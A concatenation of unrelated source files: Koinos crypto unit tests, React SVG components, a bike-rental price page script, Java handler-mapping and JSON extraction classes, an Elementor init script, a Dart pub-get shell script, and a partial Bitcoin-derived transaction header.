wif = "5KJTiKfLEzvFuowRMJqDZnSExxxwspVni1G4RcggoPtDqP5XgLz";
BOOST_REQUIRE_THROW( private_key::from_wif( wif ), key_serialization_error );
// Wrong seed, change first octal of secret (C->D)
wif = "<KEY>";
BOOST_REQUIRE_THROW( private_key::from_wif( wif ), key_serialization_error );
// Wrong prefix, change first octal of prefix (8->7)
wif = "<KEY>";
BOOST_REQUIRE_THROW( private_key::from_wif( wif ), key_serialization_error );
}
BOOST_AUTO_TEST_CASE( public_address )
{
std::string private_wif = "<KEY>";
auto priv_key = private_key::from_wif( private_wif );
auto pub_key = priv_key.get_public_key();
auto address = pub_key.to_address_bytes();
const unsigned char bytes[] = { 0x00, 0xf5, 0x4a, 0x58, 0x51, 0xe9, 0x37, 0x2b, 0x87, 0x81, 0x0a, 0x8e, 0x60,
0xcd, 0xd2, 0xe7, 0xcf, 0xd8, 0x0b, 0x6e, 0x31, 0xc7, 0xf1, 0x8f, 0xe8 };
std::string address_bytes( reinterpret_cast< const char* >( bytes ), sizeof( bytes ) );
BOOST_REQUIRE_EQUAL( address, address_bytes );
}
BOOST_AUTO_TEST_CASE( zerohash )
{
multihash mh;
mh = multihash::zero( multicodec::sha2_256 );
BOOST_CHECK( mh.code() == multicodec::sha2_256 );
BOOST_CHECK( mh.digest().size() == 256/8 );
mh = multihash::zero( multicodec::ripemd_160 );
BOOST_CHECK( mh.code() == multicodec::ripemd_160 );
BOOST_CHECK( mh.digest().size() == 160/8 );
}
BOOST_AUTO_TEST_CASE( emptyhash )
{
multihash mh = multihash::empty( multicodec::sha2_256 );
BOOST_CHECK_EQUAL( "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", hex_string( mh.digest() ) );
}
BOOST_AUTO_TEST_CASE( merkle )
{
std::vector< std::string > values
{
"the", "quick", "brown", "fox", "jumps", "over", "a", "lazy", "dog"
};
std::vector< std::string > wh_hex
{
"b9776d7ddf459c9ad5b0e1d6ac61e27befb5e99fd62446677600d7cacef544d0",
"22c72aa82ce77c82e2ca65a711c79eaa4b51c57f85f91489ceeacc7b385943ba",
"<KEY>",
"<KEY>",
"<KEY>",
"5fb6a47e368e12e5d8b19280796e6a3d146fe391ed2e967d5f95c55bfb0f9c2f",
"ca978112ca1bbdcafac231b39a23dc4da786eff8147c4e72b9807785afee48bb",
"<KEY>",
"<KEY>"
};
auto h = [&]( const multihash& ha, const multihash& hb ) -> multihash
{
std::vector< std::byte > temp;
std::copy( ha.digest().begin(), ha.digest().end(), std::back_inserter( temp ) );
std::copy( hb.digest().begin(), hb.digest().end(), std::back_inserter( temp ) );
multihash result = hash( multicodec::sha2_256, (char*)temp.data(), temp.size() );
return result;
};
// Hash of each word
std::vector< multihash > wh;
for( size_t i = 0; i < values.size(); i++ )
{
wh.push_back( hash( multicodec::sha2_256, values[i].c_str(), values[i].size() ) );
BOOST_CHECK_EQUAL( wh_hex[i], hex_string( wh[i].digest() ) );
}
const std::string n01 = "0020397085ab4494829e691c49353a04d3201fda20c6a8a6866cf0f84bb8ce47";
const std::string n23 = "78d4e37706320c82b2dd092eeb04b1f271523f86f910bf680ff9afcb2f8a33e1";
const std::string n0123 = "e07aa684d91ffcbb89952f5e99b6181f7ee7bd88bd97be1345fc508f1062c050";
const std::string n45 = "4185f41c5d7980ae7d14ce248f50e2854826c383671cf1ee3825ea957315c627";
const std::string n67 = "b2a6704395c45ad8c99247103b580f7e7a37f06c3d38075ce4b02bc34c6a6754";
const std::string n4567 = "2f24a249901ee8392ba0bb3b90c8efd6e2fee6530f45769199ef82d0b091d8ba";
const std::string n01234567 = "913b7dce068efc8db6fab0173481f137ce91352b341855a1719aaff926169987";
const std::string n8 = "cd6357efdd966de8c0cb2f876cc89ec74ce35f0968e11743987084bd42fb8944";
const std::string n012345678 = "e24e552e0b6cf8835af179a14a766fb58c23e4ee1f7c6317d57ce39cc578cfac";
multihash h01 = h( wh[0], wh[1] );
multihash h23 = h( wh[2], wh[3] );
multihash h0123 = h( h01, h23 );
multihash h45 = h( wh[4], wh[5] );
multihash h67 = h( wh[6], wh[7] );
multihash h4567 = h( h45, h67 );
multihash h01234567 = h( h0123, h4567 );
multihash h8 = wh[8];
multihash h012345678 = h( h01234567, h8 );
BOOST_CHECK_EQUAL( n01 , hex_string( h01.digest() ) );
BOOST_CHECK_EQUAL( n23 , hex_string( h23.digest() ) );
BOOST_CHECK_EQUAL( n0123 , hex_string( h0123.digest() ) );
BOOST_CHECK_EQUAL( n45 , hex_string( h45.digest() ) );
BOOST_CHECK_EQUAL( n67 , hex_string( h67.digest() ) );
BOOST_CHECK_EQUAL( n4567 , hex_string( h4567.digest() ) );
BOOST_CHECK_EQUAL( n01234567 , hex_string( h01234567.digest() ) );
BOOST_CHECK_EQUAL( n012345678, hex_string( h012345678.digest() ) );
auto tree = merkle_tree( multicodec::sha2_256, values );
BOOST_CHECK_EQUAL( n012345678, hex_string( tree.root()->hash().digest() ) );
BOOST_CHECK_EQUAL( *tree.root()->left()->left()->left()->left()->value() , values[0] ); // the
BOOST_CHECK_EQUAL( *tree.root()->left()->left()->left()->right()->value() , values[1] ); // quick
BOOST_CHECK_EQUAL( *tree.root()->left()->left()->right()->left()->value() , values[2] ); // brown
BOOST_CHECK_EQUAL( *tree.root()->left()->left()->right()->right()->value() , values[3] ); // fox
BOOST_CHECK_EQUAL( *tree.root()->left()->right()->left()->left()->value() , values[4] ); // jumps
BOOST_CHECK_EQUAL( *tree.root()->left()->right()->left()->right()->value() , values[5] ); // over
BOOST_CHECK_EQUAL( *tree.root()->left()->right()->right()->left()->value() , values[6] ); // a
BOOST_CHECK_EQUAL( *tree.root()->left()->right()->right()->right()->value(), values[7] ); // lazy
BOOST_CHECK_EQUAL( *tree.root()->right()->value() , values[8] ); // dog
std::vector< multihash > v( values.size() );
std::transform(
std::begin( values ),
std::end( values ),
std::begin( v ),
[] ( const std::string& s ) { return hash( multicodec::sha2_256, s ); }
);
auto multihash_tree = merkle_tree( multicodec::sha2_256, v );
BOOST_CHECK_EQUAL( multihash_tree.root()->hash(), tree.root()->hash() );
auto mtree = merkle_tree( multicodec::sha2_256, std::vector< std::string >() );
BOOST_CHECK( mtree.root()->hash() == multihash::empty( multicodec::sha2_256 ) );
BOOST_CHECK( mtree.root()->hash() != multihash::zero( multicodec::sha2_256 ) );
}
BOOST_AUTO_TEST_CASE( protocol_buffers_test )
{
std::string id_str = "id";
std::string previous_str = "previous";
koinos::block_topology block_topology;
block_topology.set_height( 100 );
block_topology.set_id( koinos::util::converter::as< std::string>( hash( multicodec::sha1, id_str ) ) );
block_topology.set_previous( koinos::util::converter::as< std::string>( hash( multicodec::sha2_512, previous_str ) ) );
auto mhash = hash( multicodec::sha2_256, block_topology );
std::stringstream stream;
block_topology.SerializeToOstream( &stream );
std::string str = stream.str();
std::vector< std::byte > bytes( str.size() );
std::transform( str.begin(), str.end(), bytes.begin(), []( char c ) { return std::byte( c ); } );
BOOST_CHECK( hash( multicodec::sha2_256, bytes ) == mhash );
auto id_hash = koinos::util::converter::to< multihash >( block_topology.id() );
BOOST_CHECK( id_hash == hash( multicodec::sha1, id_str ) );
auto previous_hash = koinos::util::converter::to< multihash >( block_topology.previous() );
BOOST_CHECK( previous_hash == hash( multicodec::sha2_512, previous_str ) );
auto mhash2 = hash( multicodec::sha2_256, &block_topology );
BOOST_CHECK( mhash == mhash2 );
}
BOOST_AUTO_TEST_CASE( multihash_serialization )
{
auto mhash = hash( multicodec::ripemd_160, std::string( "a quick brown fox jumps over the lazy dog" ) );
std::stringstream stream;
koinos::to_binary( stream, mhash );
multihash tmp;
koinos::from_binary( stream, tmp );
BOOST_CHECK( mhash == tmp );
std::stringstream ss;
ss << mhash;
BOOST_CHECK( ss.str() == "0xd3201409c999f213afff19793d8288023c512f71873deb" );
try {
KOINOS_THROW( koinos::exception, "test multihash in exception: ${mh}", ("mh", mhash ) );
BOOST_REQUIRE( false );
}
catch( const koinos::exception& e )
{
BOOST_REQUIRE( e.what() == std::string( "test multihash in exception: 0xd3201409c999f213afff19793d8288023c512f71873deb" ) );
}
}
BOOST_AUTO_TEST_CASE( variadic_hash )
{
std::string id_str = "id";
std::string previous_str = "previous";
koinos::block_topology block_topology;
block_topology.set_height( 100 );
block_topology.set_id( koinos::util::converter::as< std::string>( hash( multicodec::sha1, id_str ) ) );
block_topology.set_previous( koinos::util::converter::as< std::string>( hash( multicodec::sha2_512, previous_str ) ) );
std::stringstream ss;
block_topology.SerializeToOstream( &ss );
ss << "a quick brown fox jumps over the lazy dog";
koinos::uint256_t x = 0;
koinos::to_binary( ss, x );
auto mhash1 = hash( multicodec::ripemd_160, ss.str() );
auto mhash2 = hash( multicodec::ripemd_160, block_topology, std::string( "a quick brown fox jumps over the lazy dog" ), x );
BOOST_REQUIRE( mhash1 == mhash2 );
}
BOOST_AUTO_TEST_SUITE_END()
|
<filename>src/components/SVG/index.js<gh_stars>0
import styled, { css } from 'styled-components'
import _JamLogo from './JamLogo.svg'
import _Instagram from './Instagram.svg'
import _Medium from './Medium.svg'
import _Twitter from './Twitter.svg'
export const JamLogo = _JamLogo
export const Instagram = _Instagram
export const Medium = _Medium
export const Twitter = _Twitter
const small = css`
width: 20px;
height: auto;
fill: ${props => ( props.colour && props.theme.colours[ props.colour ] ) || props.theme.colours.white};
`
export const SmallMedium = styled(Medium)`
${small}
`
export const SmallTwitter = styled(Twitter)`
${small}
`
export const SmallInstagram = styled(Instagram)`
${small}
`
|
import { getData } from "../utils/FetchData";
const $sectionPrices = document.querySelector("#ViewPrices") || null;
const $selectPrices = document.querySelector("#category_id") || null;
const $card = document.querySelector("#card-info") || null;
const $spanPrince = document.querySelector("#spanPrince") || null;
const $spanAvailable = document.querySelector("#spanAvailable") || null;
const $selectSku = document.querySelector("#sku_id") || null;
const $tdColor = document.querySelector("#tdColor") || null;
const $tdFreno = document.querySelector("#tdFreno") || null;
const $tdRin = document.querySelector("#tdRin") || null;
const $tdVelocidad = document.querySelector("#tdVelocidad") || null;
const $containerImage = document.querySelector("#containerImage") || null;
const $noteAvailable = document.querySelector("#noteAvailable") || null;
const $btnRental = document.querySelector("#btnRental") || null;
const $time = document.querySelectorAll(".TimeHour") || null;
const createOption = (min) => {
const start = 0;
const end = 24;
const arrayOptions = [];
for (let index = 0; index < end; index++) {
const option = document.createElement("option");
option.value = index;
let text = "";
if (index <= 9) {
text = `0${index} : 00`;
} else {
text = `${index} : 00`;
}
option.textContent = text;
// if (parseInt(min) > index) {
// option.disabled = true;
// }
arrayOptions.push(option);
}
return arrayOptions;
};
const formTime = () => {
[...$time].forEach((select) => {
const times = createOption(select.dataset.min);
select.append(...times);
});
};
const getPrice = async (idPrice) => {
const url = `admin/precios/${idPrice}`;
try {
const response = await getData(url);
if (response.ok === true && response.status === 200) {
return response.data.data;
}
} catch (error) {
console.log(error);
debugger;
}
};
const availableBikes = async (id) => {
const url = `admin/skusAvailable/${id}`;
try {
const response = await getData(url);
if (response.ok === true && response.status === 200) {
return response.data.data;
}
} catch (error) {
console.log(error);
}
};
const getSkus = async (idCategory) => {
const url = `admin/skusCategory/${idCategory}`;
try {
const response = await getData(url);
if (response.ok === true && response.status === 200) {
return response.data.data;
}
} catch (error) {
console.log(error);
}
};
const getAttributes = async (idSku) => {
const url = `admin/attributes/${idSku}`;
try {
const response = await getData(url);
if (response.ok === true && response.status === 200) {
return response.data.data;
}
} catch (error) {
console.log(error);
}
};
const handleChangeReference = async (idReference) => {
const attributes = await getAttributes(parseInt(idReference));
$tdColor.textContent = "";
$tdFreno.textContent = "";
$tdRin.textContent = "";
$tdVelocidad.textContent = "";
attributes.map((attribute) => {
const $attr = attribute.attribute.toLowerCase();
switch ($attr) {
case "color":
$tdColor.textContent = attribute.value;
break;
case "brake":
$tdFreno.textContent = attribute.value;
break;
case "rin":
$tdRin.textContent = attribute.value;
break;
case "speed":
$tdVelocidad.textContent = attribute.value + " KM/H";
break;
}
});
$containerImage.innerHTML = "";
if (attributes.length > 0) {
const img = document.createElement("img");
img.classList.add("img-fluid");
const url =
window.location.origin +
"/images/upload/" +
attributes[0].sku.image;
img.src = url;
$containerImage.append(img);
}
const available = await availableBikes(idReference);
$spanAvailable.textContent = available;
$noteAvailable.textContent = "";
$btnRental.disabled = false;
if (available <= 0) {
$noteAvailable.textContent =
"No puedes alquilar porque no hay stock de está referencia.";
$btnRental.disabled = true;
}
};
const handleChange = async (idPrice) => {
const price = await getPrice(idPrice);
$card.querySelector(".card-header").textContent =
"Bicicleta - " + price.category.name;
const references = await getSkus(price.category.id);
const arrayOption = [];
$selectSku.innerHTML = "";
references.map((reference) => {
const option = document.createElement("option");
option.value = reference.id;
option.textContent = `${reference.id} - ${reference.name}`;
arrayOption.push(option);
});
$selectSku.append(...arrayOption);
handleChangeReference(parseInt($selectSku.value));
$selectSku.addEventListener("change", (e) => {
e.preventDefault();
handleChangeReference(parseInt(e.target.value));
});
$spanPrince.textContent = formatPrice(price.price);
};
const changeSelect = () => {
if ($selectPrices) {
$selectPrices.addEventListener("change", (e) => {
e.preventDefault();
handleChange(parseInt(e.target.value));
});
}
};
const formatPrice = (price) => {
const newPrice = new window.Intl.NumberFormat("en-EN", {
style: "currency",
currency: "USD",
}).format(price);
return newPrice;
};
const initViewPrices = () => {
window.addEventListener("DOMContentLoaded", async () => {
if ($sectionPrices) {
changeSelect();
await handleChange(parseInt($selectPrices.value));
// await handleChangeReference(parseInt($selectSku.value));
formTime();
}
});
};
export { initViewPrices };
|
package indi.nut.myspring.web.servlet.handler;
import indi.nut.myspring.ioc.beans.factory.InitializingBean;
import indi.nut.myspring.web.method.HandlerMethod;
import javax.servlet.http.HttpServletRequest;
import java.lang.invoke.MethodHandle;
import java.lang.reflect.Method;
import java.util.*;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.locks.ReentrantReadWriteLock;
/**
* Created by nut on 2016/12/29.
*/
public abstract class AbstractHandlerMethodMapping<T> extends AbstractHandlerMapping implements InitializingBean{
@Override
protected Object getHandlerInternal(HttpServletRequest request) {
return null;
}
@Override
public void afterPropertiesSet() throws Exception {
initHandlerMethods();
}
protected void initHandlerMethods(){
}
class MappingRegistry{
private final Map<T, HandlerMethod> mappingLookup = new LinkedHashMap<>();
private final Map<String,List<T>> urlLookup = new ConcurrentHashMap<>();
private final Map<String,List<HandlerMethod>> nameLookup = new ConcurrentHashMap<>();
private final ReentrantReadWriteLock readWriteLock = new ReentrantReadWriteLock();
public List<HandlerMethod> getHandlerMethodsByMappingName(String mappingName){
return this.nameLookup.get(mappingName);
}
public List<T> getMappingsByUrl(String urlPath){
return this.urlLookup.get(urlPath);
}
public void register(T mapping, Object handler, Method method) throws Exception {
HandlerMethod handlerMethod = createHandlerMethod(handler, method);
this.mappingLookup.put(mapping, handlerMethod);
List<String> directUrls = getDirectUrls(mapping);
for(String url : directUrls){
List<T> mappings = this.urlLookup.getOrDefault(url, new ArrayList<T>());
mappings.add(mapping);
urlLookup.put(url, mappings);
}
}
}
protected List<String> getDirectUrls(T mapping){
List<String> urls = new ArrayList<>(1);
//TODO pattern
for(String url : getMappingPathPatterns(mapping)){
if(!getPathMatcher().isPattern(url)){
urls.add(url);
}
}
return urls;
}
protected abstract Set<String> getMappingPathPatterns(T mapping);
protected HandlerMethod createHandlerMethod(Object handler, Method method) throws Exception {
HandlerMethod handlerMethod;
if(handler instanceof String){
String beanName = (String) handler;
handlerMethod = new HandlerMethod(beanName,getApplicationContext().getAutoWireCapableBeanFactory(), method);
}else{
handlerMethod = new HandlerMethod(handler, method);
}
return handlerMethod;
}
}
|
package kbasesearchengine.parse;
import java.io.IOException;
import java.util.ArrayList;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Set;
import com.fasterxml.jackson.core.JsonParser;
import com.fasterxml.jackson.core.JsonToken;
import kbasesearchengine.common.JsonTokenUtil;
import kbasesearchengine.common.ObjectJsonPath;
/**
* Extraction of searchable subset based on JSON token stream.
* @author rsutormin
*/
public class SubObjectExtractor {
/**
* Extract the fields listed in selection from the element and add them to the subset.
*
* selection must either be an object containing structure field names to extract, '*' in the case of
* extracting a mapping, or '[*]' for extracting a list. if the selection is empty, nothing is added.
* If extractKeysOf is set, and the element is an Object (ie a kidl mapping), then an array of the keys
* is added instead of the entire mapping.
*
* we assume here that selection has already been validated against the structure of the document, so that
* if we get true on extractKeysOf, it really is a mapping, and if we get a '*' or '[*]', it really is
* a mapping or array.
* @throws ObjectParseException
*/
public static void extract(
final ObjectJsonPath pathToSub,
final List<ObjectJsonPath> objpaths,
final JsonParser jts,
final SubObjectConsumer consumer)
throws IOException, ObjectParseException {
//if the selection is empty, we return without adding anything
SubObjectExtractionNode root = new SubObjectExtractionNode();
SubObjectExtractionNode sub = root.addPath(pathToSub, true, false);
for (ObjectJsonPath path: objpaths) {
sub.addPath(JsonTokenUtil.trimPath(path), false, true);
}
extract(root, jts, consumer);
}
public static void extract(
final SubObjectExtractionNode tree,
final JsonParser jts,
final SubObjectConsumer consumer)
throws IOException, ObjectParseException {
JsonToken t = jts.nextToken();
extractFieldsWithOpenToken(jts, t, tree, consumer, new ArrayList<String>(),
false, false, true);
consumer.flush();
}
/*
* This is main recursive method for tracking current token place in subset schema tree
* and making decisions whether or not we need to process this token or block of tokens or
* just skip it.
*/
private static void extractFieldsWithOpenToken(
final JsonParser jts,
final JsonToken current,
final SubObjectExtractionNode selection,
final SubObjectConsumer consumer,
final List<String> path,
final boolean strictMaps,
final boolean strictArrays,
final boolean fromSkippedLevel)
throws IOException, ObjectParseException {
if (fromSkippedLevel && !selection.isSkipLevel()) {
// It means we're starting sub-object (or whole object is needed)
consumer.nextObject(ObjectJsonPath.getPathText(path));
}
JsonToken t = current;
boolean skipLvl = selection.isSkipLevel();
if (t == JsonToken.START_OBJECT) { // we observe open of mapping/object in real json data
if (selection.hasChildren()) { // we have some restrictions for this object in selection
// we will remove visited keys from selectedFields and check emptiness at object end
Set<String> selectedFields = new LinkedHashSet<String>(
selection.getChildren().keySet());
if (selectedFields.size() == 1 && selectedFields.contains("{size}")) {
int size = 0;
while (true) {
t = jts.nextToken();
if (t == JsonToken.END_OBJECT) {
break;
}
if (t != JsonToken.FIELD_NAME)
throw new ObjectParseException("Error parsing json format " +
t.asString() + ", at: " + ObjectJsonPath.getPathText(path));
t = jts.nextToken();
JsonTokenUtil.skipChildren(jts, t);
size++;
}
consumer.getOutput().writeNumber(size);
} else {
boolean all = false;
SubObjectExtractionNode allChild = null;
if (selectedFields.contains("*")) {
all = true;
selectedFields.remove("*");
allChild = selection.getChildren().get("*");
if (selectedFields.size() > 0)
throw new ObjectParseException("Invalid selection: the selection path " +
"contains both '*' to select all fields and selection of " +
"specific fields (" + selectedFields + "), at: " +
ObjectJsonPath.getPathText(path));
}
// process first token standing for start of object
if (!skipLvl) {
JsonTokenUtil.writeCurrentToken(jts, t, consumer.getOutput());
}
while (true) {
t = jts.nextToken();
if (t == JsonToken.END_OBJECT) {
if (!skipLvl) {
JsonTokenUtil.writeCurrentToken(jts, t, consumer.getOutput());
}
break;
}
if (t != JsonToken.FIELD_NAME)
throw new ObjectParseException("Error parsing json format " +
t.asString() + ", at: " + ObjectJsonPath.getPathText(path));
String fieldName = jts.getText();
if (all || selectedFields.contains(fieldName)) {
// if we need all fields or the field is present in list of necessary fields
// we process it and value following after that
if (!all)
selectedFields.remove(fieldName);
if (!skipLvl) {
JsonTokenUtil.writeCurrentToken(jts, t, consumer.getOutput());
}
// read first token of value block in order to prepare state for recursive
// extractFieldsWithOpenToken call
t = jts.nextToken();
// add field to the tail of path branch
path.add(fieldName);
// process value corresponding to this field recursively
extractFieldsWithOpenToken(jts, t, all ? allChild :
selection.getChildren().get(fieldName), consumer, path,
strictMaps, strictArrays, selection.isSkipLevel());
// remove field from tail of path branch
path.remove(path.size() - 1);
} else {
// otherwise we skip value following after field
t = jts.nextToken();
JsonTokenUtil.skipChildren(jts, t);
}
}
// let's check have we visited all selected fields in this map
// we will not visit them in real data and hence will not delete them from selection
if (strictMaps && !selectedFields.isEmpty()) {
String notFound = selectedFields.iterator().next();
throw new ObjectParseException("Invalid selection: data does not contain " +
"a field or key named '" + notFound + "', at: " +
getPathText(path, notFound));
}
}
} else { // need all fields and values
if (selection.isNeedAll()) {
JsonTokenUtil.writeTokensFromCurrent(jts, t, consumer.getOutput());
} else {
JsonTokenUtil.skipChildren(jts, t);
}
}
} else if (t == JsonToken.START_ARRAY) { // we observe open of array/list in real json data
if (selection.hasChildren()) { // we have some restrictions for array item positions in selection
Set<String> selectedFields = new LinkedHashSet<String>(
selection.getChildren().keySet());
if (selectedFields.size() == 1 && selectedFields.contains("{size}")) {
int size = 0;
while (true) {
t = jts.nextToken();
if (t == JsonToken.END_ARRAY) {
break;
}
JsonTokenUtil.skipChildren(jts, t);
size++;
}
consumer.getOutput().writeNumber(size);
} else {
SubObjectExtractionNode allChild = null;
// now we support only '[*]' which means all elements and set of numbers in case of
// certain item positions are selected in array
if (!selectedFields.contains("[*]")) {
for (String item : selectedFields) {
try {
Integer.parseInt(item);
} catch (NumberFormatException ex) {
throw new ObjectParseException("Invalid selection: data at '" +
ObjectJsonPath.getPathText(path) + "' is an array, so " +
"element selection must be an integer. You requested element" +
" '" + item + "', at: " + ObjectJsonPath.getPathText(path));
}
}
}
if (selectedFields.contains("[*]")) {
selectedFields.remove("[*]");
allChild = selection.getChildren().get("[*]");
// if there is [*] keyword selected there shouldn't be anything else in selection
if (selectedFields.size() > 0)
throw new ObjectParseException("Invalid selection: the selection path " +
"contains both '[*]' to select all elements and selection of " +
"specific elements (" + selectedFields + "), at: " +
ObjectJsonPath.getPathText(path));
}
if (!skipLvl) {
JsonTokenUtil.writeCurrentToken(jts, t, consumer.getOutput()); // write start of array into output
}
for (int pos = 0; ; pos++) {
t = jts.nextToken();
if (t == JsonToken.END_ARRAY) {
if (!skipLvl) {
JsonTokenUtil.writeCurrentToken(jts, t, consumer.getOutput());
}
break;
}
SubObjectExtractionNode child = null;
if (allChild != null) {
child = allChild;
} else {
String key = "" + pos;
if (selection.getChildren().containsKey(key)) {
child = selection.getChildren().get(key);
selectedFields.remove(key);
}
}
if (child == null) {
// this element of array is not selected, skip it
JsonTokenUtil.skipChildren(jts, t);
} else {
// add element position to the tail of path branch
path.add("" + pos);
// process value of this element recursively
extractFieldsWithOpenToken(jts, t, child, consumer, path, strictMaps,
strictArrays, selection.isSkipLevel());
// remove field from tail of path branch
path.remove(path.size() - 1);
}
}
// let's check have we visited all selected items in this array
if (strictArrays && !selectedFields.isEmpty()) {
String notFound = selectedFields.iterator().next();
throw new ObjectParseException("Invalid selection: no array element exists " +
"at position '" + notFound + "', at: " + getPathText(path, notFound));
}
}
} else {
if (selection.isNeedAll()) {
// need all elements
JsonTokenUtil.writeTokensFromCurrent(jts, t, consumer.getOutput());
} else {
JsonTokenUtil.skipChildren(jts, t);
}
}
} else { // we observe scalar value (text, integer, double, boolean, null) in real json data
if (selection.hasChildren())
throw new ObjectParseException("Invalid selection: the path given specifies " +
"fields or elements that do not exist because data at this location is " +
"a scalar value (i.e. string, integer, float), at: " +
ObjectJsonPath.getPathText(path));
JsonTokenUtil.writeCurrentToken(jts, t, consumer.getOutput());
}
}
public static String getPathText(List<String> path, String add) {
path.add(add);
String ret = ObjectJsonPath.getPathText(path);
path.remove(path.size() - 1);
return ret;
}
}
|
<filename>src/main/java/com/github/peacetrue/beans/createmodify/CreateModify.java
package com.github.peacetrue.beans.createmodify;
import com.github.peacetrue.beans.create.Create;
import com.github.peacetrue.beans.modify.Modify;
/**
* @author peace
* @since 1.0
**/
public interface CreateModify<T, S> extends
CreateModifyCapable<T, S>, CreateModifyAware<T, S>,
Create<T, S>, Modify<T, S> {
}
|
(function ( $ ) {
'use strict';
$( window ).on(
'elementor/frontend/init',
function () {
qodefAddonsElementor.init();
}
);
var qodefAddonsElementor = {
init: function () {
var isEditMode = Boolean( elementorFrontend.isEditMode() );
if ( isEditMode ) {
for ( var key in qodefAddonsCore.shortcodes ) {
for ( var keyChild in qodefAddonsCore.shortcodes[key] ) {
qodefAddonsElementor.reInitShortcode(
key,
keyChild
);
}
}
}
},
reInitShortcode: function ( key, keyChild ) {
elementorFrontend.hooks.addAction(
'frontend/element_ready/' + key + '.default',
function ( e ) {
// Check if object doesn't exist and print the module where is the error
if ( typeof qodefAddonsCore.shortcodes[key][keyChild] === 'undefined' ) {
console.log( keyChild );
} else if ( typeof qodefAddonsCore.shortcodes[key][keyChild].initSlider === 'function' && e.find( '.qodef-qi-swiper-container' ).length ) {
var $sliders = e.find( '.qodef-qi-swiper-container' );
if ( $sliders.length ) {
$sliders.each(
function () {
qodefAddonsCore.shortcodes[key][keyChild].initSlider( $( this ) );
}
);
}
} else if ( typeof qodefAddonsCore.shortcodes[key][keyChild].initItem === 'function' && e.find( '.qodef-shortcode' ).length ) {
qodefAddonsCore.shortcodes[key][keyChild].initItem( e.find( '.qodef-shortcode' ) );
} else {
qodefAddonsCore.shortcodes[key][keyChild].init();
}
}
);
},
};
})( jQuery );
|
#!/bin/bash
set -e
cd `dirname $0`/..
# You can pass arguments.
#
# Example:
# ./tool/pub_get.sh --offline
#
ARGS=${@:1}
visit() {
NAME=$1
echo "-------------------------------------------------"
echo "Getting dependencies for '$NAME'"
echo "-------------------------------------------------"
echo "Running: pub get $ARGS"
OLD_PATH=`pwd`
cd $NAME
if hash pub; then
pub get $ARGS
else
flutter pub get $ARGS
fi
cd $OLD_PATH
}
visit_flutter() {
if ! hash flutter; then
return
fi
NAME=$1
echo "-------------------------------------------------"
echo "Getting dependencies for '$NAME'"
echo "-------------------------------------------------"
echo "Running: flutter pub get $ARGS"
OLD_PATH=`pwd`
cd $NAME
flutter pub get $ARGS
cd $OLD_PATH
}
visit database
visit search
visit adapters/algolia
visit adapters/elasticsearch
visit adapters/firestore_browser
visit_flutter adapters/firestore_flutter
visit_flutter adapters/firestore_flutter/example
visit adapters/postgre
visit_flutter adapters/sqlite
visit_flutter adapters/sqlite/example
visit adapters_incubator/azure
visit adapters_incubator/grpc
visit samples/example
visit_flutter samples/example_flutter |
<gh_stars>10-100
// Copyright (c) 2009-2010 <NAME>
// Copyright (c) 2009-2014 The Bitcoin developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
#ifndef BITCOIN_PRIMITIVES_TRANSACTION_H
#define BITCOIN_PRIMITIVES_TRANSACTION_H
#include "amount.h"
#include "hash.h"
#include "script/script.h"
#include "serialize.h"
#include "uint256.h"
#define SERIALIZE_VERSION_MASK_NO_WITNESS 0x40000000
#define SERIALIZE_VERSION_MASK_ONLY_WITNESS 0x80000000
#define SERIALIZE_VERSION_MASK_BITCOIN_TX 0x20000000
#define SERIALIZE_VERSION_MASK_PREHASH 0x10000000
class CTxOutValue
{
public:
static const size_t nCommitmentSize = 33;
std::vector<unsigned char> vchCommitment;
std::vector<unsigned char> vchRangeproof;
std::vector<unsigned char> vchNonceCommitment;
CTxOutValue();
CTxOutValue(CAmount);
CTxOutValue(const std::vector<unsigned char>& vchValueCommitment, const std::vector<unsigned char>& vchRangeproofIn);
ADD_SERIALIZE_METHODS;
template<typename Stream, typename Operation>
inline void SerializationOp(Stream& s, Operation ser_action, int nType, int nVersion)
{
bool fBitcoinTx = nVersion & SERIALIZE_VERSION_MASK_BITCOIN_TX;
bool fWitness = (nVersion & SERIALIZE_VERSION_MASK_NO_WITNESS) == 0;
bool fOnlyWitness = nVersion & SERIALIZE_VERSION_MASK_ONLY_WITNESS;
assert(!fBitcoinTx || IsAmount() || (IsNull() && ser_action.ForRead()));
if (fBitcoinTx) {
CAmount amount = 0;
if (!ser_action.ForRead())
amount = GetAmount();
READWRITE(amount);
if (ser_action.ForRead())
SetToAmount(amount);
} else {
if (!fOnlyWitness) READWRITE(REF(CFlatData(&vchCommitment[0], &vchCommitment[nCommitmentSize])));
if (fWitness) {
if (nVersion & SERIALIZE_VERSION_MASK_PREHASH) {
uint256 prehash = (CHashWriter(nType, nVersion) << vchRangeproof << vchNonceCommitment).GetHash();
READWRITE(prehash);
} else {
READWRITE(vchRangeproof);
READWRITE(vchNonceCommitment);
}
}
}
}
bool IsValid() const;
bool IsNull() const;
bool IsAmount() const;
CAmount GetAmount() const;
void SetToAmount(CAmount nAmount);
friend bool operator==(const CTxOutValue& a, const CTxOutValue& b);
friend bool operator!=(const CTxOutValue& a, const CTxOutValue& b);
};
/** An outpoint - a combination of a transaction hash and an index n into its vout */
class COutPoint
{
public:
uint256 hash;
uint32_t n;
COutPoint() { SetNull(); }
COutPoint(uint256 hashIn, uint32_t nIn) { hash = hashIn; n = nIn; }
ADD_SERIALIZE_METHODS;
template <typename Stream, typename Operation>
inline void SerializationOp(Stream& s, Operation ser_action, int nType, int nVersion) {
READWRITE(FLATDATA(*this));
}
void SetNull() { hash = 0; n = (uint32_t) -1; }
bool IsNull() const { return (hash == 0 && n == (uint32_t) -1); }
friend bool operator<(const COutPoint& a, const COutPoint& b)
{
return (a.hash < b.hash || (a.hash == b.hash && a.n < b.n));
}
friend bool operator==(const COutPoint& a, const COutPoint& b)
{
return (a.hash == b.hash && a.n == b.n);
}
friend bool operator!=(const COutPoint& a, const COutPoint& b)
{
return !(a == b);
}
std::string ToString() const;
};
/** An input of a transaction. It contains the location of the previous
* transaction's output that it claims and a signature that matches the
* output's public key.
*/
class CTxIn
{
public:
COutPoint prevout;
CScript scriptSig;
uint32_t nSequence;
CTxIn()
{
nSequence = ~(uint32_t)0;
}
explicit CTxIn(COutPoint prevoutIn, CScript scriptSigIn=CScript(), uint32_t nSequenceIn=~(uint32_t)0);
